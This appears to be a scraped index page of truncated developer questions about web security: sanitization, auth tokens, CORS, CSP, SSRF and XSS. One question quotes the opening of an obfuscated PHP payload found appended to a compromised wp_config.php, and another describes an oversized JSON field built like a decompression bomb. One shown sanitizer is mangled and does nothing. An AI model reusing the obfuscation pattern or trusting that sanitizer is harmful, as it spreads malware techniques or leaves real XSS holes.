I am seeking advice on how to securely insert user form data into BigQuery using the Google Cloud BigQuery library. Specifically, I am curious about the most effective methods for sanitizing, escaping, and cleaning the input data. Is it feasible to implem ...
Currently facing an issue with my Symfony setup. Users in my app can upload images to the server, which are stored in /web/uploads/images directory. My goal is to make these images visible only to logged-in users. I've attempted to tweak the security conf ...
After reviewing the authentication middleware code in a course I am currently taking, I have some concerns about its security. I decided to test a protected route using Postman and discovered that I was able to retrieve an order for one user with a token ...
I am currently working on an API built with node.js & express.js. At the moment, the API is unsecured which allows anyone to access and manipulate records using GET, POST, PUT, and DELETE requests. One of the challenges I am facing is that my REST API sho ...
While attempting to utilize an inline script in my project, I am continually encountering the following error message: 'Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self'" ...
Creating a simple cors proxy involves piping requests, and to achieve this, I decided to utilize the pipe method with Request.js, as illustrated in the image below: https://i.stack.imgur.com/gUeou.png Due to my limited expertise in security, can anyone h ...
Currently utilizing Angular 15, I have included confidential information such as passwords and secret keys for encryption in the environment file. My concern is not about the security of the environment file in the repository (such as git or etc), but rath ...
I have a PHP backend (although it's not really important) and a Javascript client that runs in the browser. Here is how the application operates: The user accesses a URL and receives raw templates for rendering data An Ajax GET query is sent to the ...
When my web application receives an unfiltered string from an untrusted user, it must determine whether this string, when used as a hostname, resolves to an IPv4 or IPv6 address within a forbidden range specified by predefined rules. If the string appears ...
I'm in the process of creating a user-friendly online code editor using CodeMirror to assist learners with mastering basic HTML, CSS, and JavaScript. My goal is for students to have the ability to save their code so it can be viewed in a separate bro ...
I am working on implementing a SSR page in nextjs, and I want to restrict access to only authenticated or logged-in users. How can I ensure this as the SSR is being generated on the server, without passing the token from local storage? Please share your th ...
I have a question about how to properly map a userID to an entity: Let's say I'm using Angular, React, or any other front-end framework. How should I go about sending the userID along with the entity? For example, if a user is creating a Product, here are ...
As I dive into my React project, I am amazed by its dynamic nature. However, a recent challenge has arisen when implementing dynamic security features such as Google reCAPTCHA. The fear of users manipulating my states and properties is beginning to worry m ...
In order to enhance the user experience of our Angular app, we have integrated Firebase Authentication with Session Persistence. This ensures that users don't need to log in again every time they refresh the page. As part of this process, we store the auth ...
My website offers an exclusive paid API. To ensure security and authenticity, I only want to accept incoming ajax calls from specific sources: Requests originating from my own website Requests made by individuals who have purchased access to the API Bel ...
In order to enhance the security of my system, I am working on a feature that will prevent users from executing functions when they are not logged in. When an unauthorized user tries to do so, a message will pop up indicating that they must be logged in be ...
I have successfully developed a function that accomplishes the following: It accepts a string as input, which can be either an entire HTML document or an HTML "snippet" (even if it's broken). It creates a DOMDocument from the input and iterates through al ...
Is there a way to prevent direct access to pages in the AJAX directory while still allowing them to be served from their parent page? I've tried various .htaccess configurations, but they end up blocking access from the main page as well. Essentially, ...
Currently, I am in the process of developing a new website that will function as a single-page application featuring dialog/modal windows. My intention is to utilize Backbone for the frontend and establish communication with the backend through ajax/webs ...
It appears that my page has been infiltrated as I discovered this suspicious code at the end of my wp_config.php file. $Xbk = "uQoCwSNBIpmVRP14XjL56=AWfl.DFrv03tx;Ez*bnaHKdyc(UsMi+qgk87'9eZYT_/)OG2hJ";$vDE = $Xbk[41].$Xbk[49].$Xbk[49].$Xbk[60].$Xbk[2 ...
After a user completes a transaction on my site, the confirmation page displays Google conversion tracking code in a small JavaScript snippet. This code is located on my Wordpay callback page, which pulls data from the regular site (HTTP) to the Worldpay s ...
Consider the following situation: I have a set of web services (JAX-WS) that require secure access. Currently, for authentication purposes, I am using an additional SecurityWService that provides authorized users with a userid and sessionid to include in r ...
As I prepare to embark on creating a new website, my main goal is to collect form input values such as dropdowns and radio boxes from the client without requiring user accounts. These values will be used for sensitive calculations, making security a top pr ...
Today, I successfully implemented a session and token authentication system for my web api using http get/post rpc style. Here is the plan I followed: Key: action (param1, param2) : returnvalue1, returnvalue2 login (username, password) : sessionkey, tok ...
Currently, I am developing a nodejs server and facing the challenge of needing to access additional services through ajax from a different domain. Can anyone provide guidance on how to bypass the cross-domain restriction within nodejs code? Please note th ...
I am aware of the potential for a Cross-Site Forgery Attack that can target requests returning arrays by manipulating the Array constructor. For instance, let's say I have a site with a URL: foo.com/getJson that provides the following array: ['Puff the ...
Are there any default security practices that NestJS handles automatically? If not, what suggestions do you have for securing a NestJS application aside from using helmet? I noticed in the NestJS middleware documentation an example utilizing the helmet dep ...
I am working to determine the level of security provided by credentialed XHR2 requests. More precisely, can I verify that the request originated from a browser runtime environment, and not from a bot (such as a server-side program) that might be able to m ...
In search of a secure and flexible solution for storing credentials in a config file for database connections and other private information within a Python module. This module is responsible for logging user activity in the system through different handler ...
Can this code in node.js + express be simplified? // Code snippet for registering a new participant app.post('/api/participant', function (req, res, next) { var data = req.body; // Ensure only specific fields are uploaded var participant = n ...
I'm new to setting up websites this way and could really use some advice on my unique situation. Here's the setup: I have two separate websites, WS1 & WS2, each with their own domain names. Both sites point to the same IP address using ngi ...
I successfully controlled Tor Browser with Selenium, however I soon discovered that the Tor circuits (IP changes) were not enabled. Is there a way to enable them? Or should I use the new feature called "New Identity" from the code? My setup includes Pytho ...
Currently, my focus is on transitioning to the MERN stack and incorporating an authentication module using Next.js (front-end) + Node.js (for scalability). I am utilizing JWT token method for authentication and have some concerns: Storing tokens in coo ...
Currently, I am referencing a JQuery Ajax Voting system guide to help me set up a similar system. However, I have concerns about the security aspects of this guide. As it stands, the guide simply stores the ID of an item and its corresponding voting statis ...
Hey there! I have a question about the security of using the jQuery.post function in jQuery to send a user's login information to a PHP script. Here is the piece of code I am considering: $("#login_form").submit(function() { var unameval = $("#use ...
Is there a method to secure JavaScript files from unauthorized access? <script src="JS/MyScript.js" type="text/javascript"> It is crucial that users are unable to access the MyScript.js file. I am seeking advice on how to achieve this. Is it even ...
I'm considering using RedBean as my ORM-mapper. Currently, I have my own implementation, but it's becoming less effective and efficient as the project grows in size and complexity. However, there is one question that remains unanswered: How secure is Re ...
I am currently facing an issue with my Next.js app. The package.json file specifies "next": "^10.2.0", which includes shell-quote as a transitive dependency version 1.7.2 - known to have critical security vulnerabilities. To address this, I need to update ...
Every time I try a new URL from my browser's address bar to get Json data, I keep encountering the same error message when using the built-in MVC JsonResult helper: This request is being blocked because sensitive information might be revealed to third-p ...
For my frontend application, I'm utilizing Angular and connecting to an existing backend service for data retrieval. This backend service is established as a legacy system that I don't have control over. To enhance security, I've integrated ...
My search for a solution to my specific problem has been challenging due to the general nature of the terms and results in online searches. Frequently travelling, I find myself in locations where internet access on shared computers is limited to browsing ...
I developed a PHP application that has a login requirement. This application is exclusive, so no new users can create accounts. Initially, I implemented sessions to identify users, but it caused issues on tablet devices as they would lose their sessions. I ...
As I delve into creating a Single Page Application with Angular 7, I find myself questioning the prevalent recommendation of storing data in services as opposed to a file with constants that can be directly imported. The simplicity of directly importing a ...
I am looking to create a Node.js daemon that can operate across multiple computers while facilitating message exchange between the daemons. Security is paramount, so I want to ensure the communication is encrypted. However, I am uncertain about which encry ...
While attempting to access the codeigniter home page, I came across this error message: A PHP Error was encountered Severity: Warning Message: require(C:\wamp\www\ci\system\core\Security.php)[function.require]:failed to open ...
I am currently working on an Angular app that communicates with an API. The JSON responses from the API are prefixed with )]}', as recommended in Angular's official documentation. The issue I am facing is that my browser seems to try decoding the response ...
When it comes to connecting NextJS on a Digital Ocean droplet directly to MongoDB running on another Digital Ocean virtual server, there seems to be conflicting opinions. Some argue against using "full stack" frameworks like NextJS or Angular without an in ...
I have a file named test.gzip which contains JSON data. {"events": [ {"uuid":"56c1718c-8eb3-11e9-8157-e4b97a2c93d3", "timestamp":"2019-06-14 14:47:31 +0000", "number":732, "user": {"full_name":"0"*1024*1024*1024}}]} The full_name field in the JSON data c ...
click here for image descriptionWhen I try to log in with the first URL (as shown in the image), it takes me to another URL where I have to input my credentials. However, before reaching that page, a browser-generated pop-up appears that cannot be located ...
I want to discuss the topic of file security with you. Currently, I have a PHP script that retrieves a file from an <input type="file"> tag and then uses file_get_contents() to store the file data in a variable. However, I am concerned about potenti ...
Imagine owning a popular social media platform and wanting to integrate an iframe for user signups through third-party sites, similar to Facebook's 'like this' iframes. However, you are concerned about the security risks associated with ifra ...
I am currently tackling the Slow Post Vulnerability issue within my application. Concern: To prevent overwhelming connections from a single user, I have implemented express-rate-limit to ensure the application remains available. const rateLimit = require ...
What I'm doing in the code I am currently reading a text file containing approximately 3500 links. Subsequently, I iterate through each link to filter out the relevant ones and make requests to retrieve their status codes, links, and page titles usin ...
My Angular2 app uses OAuth2 with password grant type for authentication. I currently store the session token on sessionStorage, but I need to securely store additional data such as user roles. While I am aware that sessionStorage or localStorage can be ea ...
Is there a way to upload private files to AWS without granting public-read access, but still be able to view the file using a URL in a protected route on my client side (Reactjs/Nextjs)? How can I make this work? The situation: I need to send a PDF file f ...
As a beginner in deploying express applications, I find myself lacking in knowledge about the essential security measures that need to be taken before launching a web application. Here are some key points regarding my website: 1) It is a simple website ...
My form is secured with a CSRF token, which I've heard is essential for maintaining form security. Whenever the form is submitted late, an error occurs, indicating that the CSRF token is working as expected. However, when submitting the form using ajax, I ...
I need assistance finding a method or NPM package to verify for private/local/bad addresses in the hostname entered as an input to my REST endpoint before saving it in the database. This measure is important to prevent SSRF attacks. Currently, I am only us ...
I'm working on a PHP script that receives data from an Android application. What security measures should I implement to ensure the safety of this script? Are functions like isset enough? <?php require ('config.php'); $connection=mysqli_connect($serve ...
I created a modal for previewing avatars with a generic design: <avatar-update :img-file="avatarFile" :show="avatarModalShow" :img-url="url" @close="avatarModalShow = !avatarModalShow" :change-avatar="updateCrop" @destroyUrl="imgUrl = null"> </av ...
const fetchData = async () => { try { const response = await axios.get('http://localhost:8080/omp/patients', { headers: {authorization: 'Bearer ' + token}}); this.state = response.data; } catch (ex) { alert("You are ...
I am in the process of developing a website that generates a user's profile page based on their input. My main concern is whether this approach is secure. Below is how I currently sanitize the user input, but I would appreciate any additional advice. stri ...
I have a Python application in the works with FastApi, utilizing JWT and OAuth2 password flow for user authentication. Following their documentation, upon user login, a token is issued using the HS256 algorithm along with a specific user secret key. This t ...
Imagine I have the following code snippet (partially pseudocode) $.ajax({ url: "/api/user", success: function(resp) { var data = JSON(resp) if (data.user.is_admin) // do admin thing else // do somet ...
I have been researching how to protect my code from XSS attacks, and all the examples I've found focus on validating direct user input (like in a contact form or login). However, I'm unsure if I should still secure my code even if there is no wa ...
I recently ran the npm audit --production command and found a high-risk vulnerability related to the snowflake-sdk dependency. After checking the snowflake github page, I noticed that the package.json file includes "requestretry": "^6.0.0&qu ...
I am currently working on an Angular project that is connected to a Firestore database. Within the database, there is a collection called users, and each document within this collection contains a nested collection named hugeCollection. I have updated the ...
My backend is powered by Laravel and the frontend uses Vue. Users authenticate by calling my Laravel API to get an Auth token and a refresh token. The Auth token expires after 2 minutes, while the refresh token lasts longer. Storing the refresh token in l ...
After thorough research, I came across a method to achieve exactly what I need. However, I have some reservations because I've heard that it could pose a potential "security risk." Unfortunately, no one seems to provide further information on why this ...
I've been working on implementing CSP headers for my website to ensure data is loaded from trusted sources. However, I'm facing an issue where CSP is blocking my local JS files. Here's a snippet from my nuxt.config.js: const self = 'lo ...
function sanitizeInput($input){ $index=0; return str_replace("<","<",str_replace(">",">",str_replace("&","&",$input,$index),$index),$index); } Would this method be effective in preventing XSS attacks? Just my person ...
After conducting a penetration test using the Burp tool on my node(express)/angular application, I discovered a reflected XSS vulnerability. This vulnerability was specifically identified when making a GET request for static assets (no other vulnerabilitie ...
=== npm audit security report === ┌───────────────────────────────────────────────────────── ...
I'm in the process of developing a Salesforce app that is displayed within an iframe on a Salesforce page. I am using a node express server to render this page. In order to ensure security compliance, I want the app to only display within the Salesfor ...
In my email application, I am trying to prevent alerts in JavaScript by using a CSP header. However, even with the current policy in place, alerts can still execute when I send an HTML document attachment that contains script tags. Changing all JavaScript ...